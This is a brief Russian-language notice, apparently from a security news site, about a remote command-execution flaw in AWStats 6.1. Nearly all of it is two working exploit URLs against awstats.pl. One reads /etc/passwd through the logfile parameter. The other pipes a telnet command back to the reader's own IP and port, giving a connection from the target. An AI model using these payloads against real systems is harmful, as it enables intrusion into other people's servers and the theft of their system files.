Программа: AWStats 6.1 

Уязвимость в AWStats позволяет удаленному пользователю выполнить произвольные команды на целевой системе. 

Пример: 

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines= 5000&config=stats.jdims.info&framename=
main&pluginmode=rawlog&logfile= /etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines= 5000&config=stats.jdims.info&framename=main&
pluginmode=rawlog&logfile=&logfile= |telnet<your ip> <port>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии